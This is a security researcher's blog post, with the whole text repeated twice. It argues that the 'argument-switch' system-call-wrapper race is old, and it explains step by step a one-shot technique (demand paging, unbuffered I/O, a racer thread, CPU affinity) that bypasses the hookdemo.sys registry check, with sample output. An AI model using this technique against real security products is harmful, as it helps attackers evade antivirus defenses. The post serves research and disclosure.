Security is Burning - Everything Old is New Again
Every time I convince myself not to make any more public posts, something almost magically occurs to make me change my mind.
The day before yesterday was a particularly boring day, when out of the blue a friend of mine dropped me an email bearing a link along with the following tongue-in-cheek remark:
"Looks familiar, doesn't it? :)))))"
What he linked me to was this URL.
It seems the latest trend in security research right now involves people forging new "names" for ~decade-old security issues. In this particular case, the attack referred to by the Matousec link was generously rechristened an "argument-switch attack". Are we that short on things to talk about? Or maybe we're all just assumed to be amnesiacs by our peers? Who knows.
Just to cite just a few references (there are many more out there) to the
"Awful and Gruesome System Call Wrapper Flaw-By-Design" approach:
- 1) http://seclists.org/bugtraq/2003/Dec/351 - Andrey Kolishak
- 2) http://www.watson.org/~robert/2007woot/2007usenixwoot-exploitingconcurrency.pdf - Robert Watson
- 3) http://events.ccc.de/congress/2007/Fahrplan/events/2353.en.html - myself and twiz
What's funny is that when I re-read what I myself wrote in that presentation [3], I realized that I'd *also* "forged" a ridiculous new name, as well: "Handle Object Redirect Attacks" -- woot! Go me! It's so irresistible, forging useless new names!!
I don’t want to criticize the work of any other researchers, and I tend to think that the Matousec people did find these issues by themselves –- spending (wasting?) a lot of time attempting also to advise security firms about the presence of this issue on almost all of their products... But despite this fact, I can state with a good degree of certainty that almost all of the major AV firms HAVE KNOWN about it for years.
Anyone dealing with this sort of thing also knows why they didn't change/fix anything. Is it worth changing, when you consider comparing the effort of changing the products' core engines against the real risk ? I think not.
As a side-note... we never really thought that any of this was a critical issue, to begin with… after all, I'm pretty sure that by now most people in the security field are aware of the fact that running untrusted native code on a box practically translates to 'ring 0 access'...
but hey -- that's a whole other story entirely. :)
Moreover there is cause to have reasonable doubt about how deep such research has actually been. Citing from their article:
"The argument-switch attack requires specific behavior from system scheduler which is impossible to ensure from user mode."
Thinking “Good! Maybe they simply wrote an in-depth analysis only for their customers?” (citing from their article: “The full results of the research were offered to our clients and other software vendors”. Who knows?! :D )
Well, stating that the scheduler behavior cannot be controlled at all from userland is a little simplistic. As anybody who has dealt with kernel exploitation knows very well, there is no way the kernel can trust the user land. If the vulnerable kernel control path runs in process-context and it directly references a virtual userland address, you can always force it to perform a deterministic context-switch. This can be done indistinctly, and of course one-shot, on both Multi-processor and Uni-processor systems.
I've seen a lot of posts speculating against the fact that this vulnerability can be exploited using only a bruteforce approach and that this is reliable with a few tries only on SMP boxes.
That’s NOT true.
Using a bruteforce approach, sooner or later the check WILL certainly get bypassed, true…, but what do you do if the AV engine simply blocks the first attempt, showing a process-blocking pop-up or blacklisting the process? etc.. In my humble opinion, taking this approach accomplishes little more than making the vulnerability completely useless (ie, even more than it already was to begin with). The bypass MUST be one-shot-always.
I think it is now time to show the PoC I wrote during the presentation [3] but never released till now. It exploits the “Demand Paging” mechanism together with the “Direct I/O” and cache write-through to accomplish the one-shot bypass.
Modern OSs have supported these concepts for ages, and exploiting them to control the context switch is, in most of the cases, an easy task; Windows is no exception. The PoC demonstrates how to bypass one-shot the famous hookdemo.sys vulnerable driver (written by Andrey Kolishak in [1]) on Uni-Processor systems.
The driver simply wraps the ZwOpenKey() system call, trying to prevent access to the following key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”.
The driver uses two different methods to deny access to the given resource Registry key. The following PoC has been written to address the first (default) hook implementation which dereferences the userland object twice.
The PoC code is straightforward. It manages two different string names.
A monitored key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”
A fake key: “\HKEY_LOCAL_MACHINE\Software\hookfake\test1” .
The userland process issues a system call using the fake key while a racer thread modifies it after the thread issuing the system call gets switched away from the current CPU. Everything works one-shot in a deterministic way. Let’s see how:
The userland process first creates (CreateFile()) a non-existent random file name using the Direct I/O flags (which is FILE_FLAG_NO_BUFFERING on Windows) . Next, respecting the granularity alignment constrains, the code writes the last common part of the key (“test1”) into this file (WriteFile()) and closes the handle. Since the Cache Manager cannot rely on the system file cache during the next file-read, the kernel is forced to access the file on the disk, issuing an arbitrary reschedule. Using the FILE_FLAG_WRITE_THROUGH flag alone is not enough since the data will be suddenly written onto the disk but at the same time the system file cache gets filled with the actual data and will be reused later.
The next step concerns the creation of double memory mapping (CreateFileMapping() and MapViewOfFileEx()). The former is an anonymous mapping. The latter is placed right after the former map and maps the first section of the aforementioned file. Since Windows uses the Demand Paging mechanism, the system just creates an internal structure to keep track of the new mapping and returns. The file data corresponding to the actual mapping is not pushed into the cache and no page tables are even set up. Now that the two mappings are created, we can put the former part of the fake key (“\HKEY_LOCAL_MACHINE\Software\hookfake\”) into the last part of the first mapping. Doing so, the former part of the key string is already in memory and the latter contiguous part exists only within the disk and is not yet loaded into memory.
We can now manually build the system call parameters, putting the address of the key string into the UNICODE_STRING object referenced by the OBJECT_ATTRIBUTES structure.
We need to do one last thing: before invoking the system call, we need to set up the racer thread. This thread spins on a process global variable, waiting for its state change. When the state changes the racer thread substitutes the “hookfake” string with the “hookdemo” string, restoring the original key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”.
But when will this be done? Let’s take a look at the hookdemo.sys driver:
During the NewZeOpenKey() system call wrapper routine, the code accesses the user-supplied key string at this line:
[ ... ]
rc = RtlAppendUnicodeStringToString(&KeyName, ObjectAttributes->ObjectName);
[ ... ]
ObjectName is the UNICODE_STRING structure holding the reference to our key string. When the driver tries to copy the final part of the key string (the one placed on the second mapping: “test1”) into the local KeyName object, the system generates a page fault since no page tables have been set up yet.
Moreover, the Windows Cache Manager realizes that 1) there is no cache available 2) the file I/O and memory mapped file MUST NOT pass through the cache (since the file has been opened with the FILE_FLAG_NO_BUFFERING) and begins a disk data transfer putting the process to sleep, thus rescheduling!! At this point, the wrapper routine has already copied the former part of the key; when the thread is scheduled back, the routine simply continues to copy the remaining part (and everything happens totally transparently from the driver wrapper perspective).
Just after the context switch occurs, the racer thread modifies the original (already copied) string and exits. Finally the original system call, which will be called by the system call wrapper, will manage a different key string: the one we are interested in! Game Over!
Just a side note: to succeed we need for the two threads to be serialized. The second thread must not run before the first thread is scheduled, but at the same time it has to run only AFTER the former thread invokes the system call. This is achieved by making the former thread set a global spinning variable which will be monitored by the racer thread. To be sure that the second thread will not modify the string before the first thread actually performs the system call we must assure that the two thread run always on the same processor! Ironically, this code natively performs correctly ONLY on Uni-processor boxes. If we are playing with multi-core/multi-processor systems we have to assure that all of the process’s threads run on a given CPU using the processor affinity API (e.g. SetProcessAffinityMask()) as shown in the PoC.
This is just a sample output:
TSC Analysis: Before SystemCall = 174341962662283 After SystemCall = 174341962672609
[Diff] => 10326
Called normally: Key Handle: 0xffffffff
TSC Analysis: Before SystemCall = 174341968174781 After SystemCall = 174342017146092
[Diff] => 48971311
Check Bypassed: Game Over! KeyHandle: 0x7bc
As we can see, the first try has been made calling the system call without special mapping, directly passing the original key string. The wrapper intercepts the call and denies access to the registry key. The second try has been made using the special mapping describe above and, as we can see, the system call returns a valid handle. Game Over.
The PoC code can be downloaded [here].
The hookdemo.sys code by Andrey Kolishak can be downloaded [here].
The day before yesterday was a particularly boring day, when out of the blue a friend of mine dropped me an email bearing a link along with the following tongue-in-cheek remark:
"Looks familiar, doesn't it? :)))))"
What he linked me to was this URL.
It seems the latest trend in security research right now involves people forging new "names" for ~decade-old security issues. In this particular case, the attack referred to by the Matousec link was generously rechristened an "argument-switch attack". Are we that short on things to talk about? Or maybe we're all just assumed to be amnesiacs by our peers? Who knows.
Just to cite just a few references (there are many more out there) to the
"Awful and Gruesome System Call Wrapper Flaw-By-Design" approach:
- 1) http://seclists.org/bugtraq/2003/Dec/351 - Andrey Kolishak
- 2) http://www.watson.org/~robert/2007woot/2007usenixwoot-exploitingconcurrency.pdf - Robert Watson
- 3) http://events.ccc.de/congress/2007/Fahrplan/events/2353.en.html - myself and twiz
What's funny is that when I re-read what I myself wrote in that presentation [3], I realized that I'd *also* "forged" a ridiculous new name, as well: "Handle Object Redirect Attacks" -- woot! Go me! It's so irresistible, forging useless new names!!
I don’t want to criticize the work of any other researchers, and I tend to think that the Matousec people did find these issues by themselves –- spending (wasting?) a lot of time attempting also to advise security firms about the presence of this issue on almost all of their products... But despite this fact, I can state with a good degree of certainty that almost all of the major AV firms HAVE KNOWN about it for years.
Anyone dealing with this sort of thing also knows why they didn't change/fix anything. Is it worth changing, when you consider comparing the effort of changing the products' core engines against the real risk ? I think not.
As a side-note... we never really thought that any of this was a critical issue, to begin with… after all, I'm pretty sure that by now most people in the security field are aware of the fact that running untrusted native code on a box practically translates to 'ring 0 access'...
but hey -- that's a whole other story entirely. :)
Moreover there is cause to have reasonable doubt about how deep such research has actually been. Citing from their article:
"The argument-switch attack requires specific behavior from system scheduler which is impossible to ensure from user mode."
Thinking “Good! Maybe they simply wrote an in-depth analysis only for their customers?” (citing from their article: “The full results of the research were offered to our clients and other software vendors”. Who knows?! :D )
Well, stating that the scheduler behavior cannot be controlled at all from userland is a little simplistic. As anybody who has dealt with kernel exploitation knows very well, there is no way the kernel can trust the user land. If the vulnerable kernel control path runs in process-context and it directly references a virtual userland address, you can always force it to perform a deterministic context-switch. This can be done indistinctly, and of course one-shot, on both Multi-processor and Uni-processor systems.
I've seen a lot of posts speculating against the fact that this vulnerability can be exploited using only a bruteforce approach and that this is reliable with a few tries only on SMP boxes.
That’s NOT true.
Using a bruteforce approach, sooner or later the check WILL certainly get bypassed, true…, but what do you do if the AV engine simply blocks the first attempt, showing a process-blocking pop-up or blacklisting the process? etc.. In my humble opinion, taking this approach accomplishes little more than making the vulnerability completely useless (ie, even more than it already was to begin with). The bypass MUST be one-shot-always.
I think it is now time to show the PoC I wrote during the presentation [3] but never released till now. It exploits the “Demand Paging” mechanism together with the “Direct I/O” and cache write-through to accomplish the one-shot bypass.
Modern OSs have supported these concepts for ages, and exploiting them to control the context switch is, in most of the cases, an easy task; Windows is no exception. The PoC demonstrates how to bypass one-shot the famous hookdemo.sys vulnerable driver (written by Andrey Kolishak in [1]) on Uni-Processor systems.
The driver simply wraps the ZwOpenKey() system call, trying to prevent access to the following key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”.
The driver uses two different methods to deny access to the given resource Registry key. The following PoC has been written to address the first (default) hook implementation which dereferences the userland object twice.
The PoC code is straightforward. It manages two different string names.
A monitored key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”
A fake key: “\HKEY_LOCAL_MACHINE\Software\hookfake\test1” .
The userland process issues a system call using the fake key while a racer thread modifies it after the thread issuing the system call gets switched away from the current CPU. Everything works one-shot in a deterministic way. Let’s see how:
The userland process first creates (CreateFile()) a non-existent random file name using the Direct I/O flags (which is FILE_FLAG_NO_BUFFERING on Windows) . Next, respecting the granularity alignment constrains, the code writes the last common part of the key (“test1”) into this file (WriteFile()) and closes the handle. Since the Cache Manager cannot rely on the system file cache during the next file-read, the kernel is forced to access the file on the disk, issuing an arbitrary reschedule. Using the FILE_FLAG_WRITE_THROUGH flag alone is not enough since the data will be suddenly written onto the disk but at the same time the system file cache gets filled with the actual data and will be reused later.
The next step concerns the creation of double memory mapping (CreateFileMapping() and MapViewOfFileEx()). The former is an anonymous mapping. The latter is placed right after the former map and maps the first section of the aforementioned file. Since Windows uses the Demand Paging mechanism, the system just creates an internal structure to keep track of the new mapping and returns. The file data corresponding to the actual mapping is not pushed into the cache and no page tables are even set up. Now that the two mappings are created, we can put the former part of the fake key (“\HKEY_LOCAL_MACHINE\Software\hookfake\”) into the last part of the first mapping. Doing so, the former part of the key string is already in memory and the latter contiguous part exists only within the disk and is not yet loaded into memory.
We can now manually build the system call parameters, putting the address of the key string into the UNICODE_STRING object referenced by the OBJECT_ATTRIBUTES structure.
We need to do one last thing: before invoking the system call, we need to set up the racer thread. This thread spins on a process global variable, waiting for its state change. When the state changes the racer thread substitutes the “hookfake” string with the “hookdemo” string, restoring the original key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”.
But when will this be done? Let’s take a look at the hookdemo.sys driver:
During the NewZeOpenKey() system call wrapper routine, the code accesses the user-supplied key string at this line:
[ ... ]
rc = RtlAppendUnicodeStringToString(&KeyName, ObjectAttributes->ObjectName);
[ ... ]
ObjectName is the UNICODE_STRING structure holding the reference to our key string. When the driver tries to copy the final part of the key string (the one placed on the second mapping: “test1”) into the local KeyName object, the system generates a page fault since no page tables have been set up yet.
Moreover, the Windows Cache Manager realizes that 1) there is no cache available 2) the file I/O and memory mapped file MUST NOT pass through the cache (since the file has been opened with the FILE_FLAG_NO_BUFFERING) and begins a disk data transfer putting the process to sleep, thus rescheduling!! At this point, the wrapper routine has already copied the former part of the key; when the thread is scheduled back, the routine simply continues to copy the remaining part (and everything happens totally transparently from the driver wrapper perspective).
Just after the context switch occurs, the racer thread modifies the original (already copied) string and exits. Finally the original system call, which will be called by the system call wrapper, will manage a different key string: the one we are interested in! Game Over!
Just a side note: to succeed we need for the two threads to be serialized. The second thread must not run before the first thread is scheduled, but at the same time it has to run only AFTER the former thread invokes the system call. This is achieved by making the former thread set a global spinning variable which will be monitored by the racer thread. To be sure that the second thread will not modify the string before the first thread actually performs the system call we must assure that the two thread run always on the same processor! Ironically, this code natively performs correctly ONLY on Uni-processor boxes. If we are playing with multi-core/multi-processor systems we have to assure that all of the process’s threads run on a given CPU using the processor affinity API (e.g. SetProcessAffinityMask()) as shown in the PoC.
This is just a sample output:
TSC Analysis: Before SystemCall = 174341962662283 After SystemCall = 174341962672609
[Diff] => 10326
Called normally: Key Handle: 0xffffffff
TSC Analysis: Before SystemCall = 174341968174781 After SystemCall = 174342017146092
[Diff] => 48971311
Check Bypassed: Game Over! KeyHandle: 0x7bc
As we can see, the first try has been made calling the system call without special mapping, directly passing the original key string. The wrapper intercepts the call and denies access to the registry key. The second try has been made using the special mapping describe above and, as we can see, the system call returns a valid handle. Game Over.
The PoC code can be downloaded [here].
The hookdemo.sys code by Andrey Kolishak can be downloaded [here].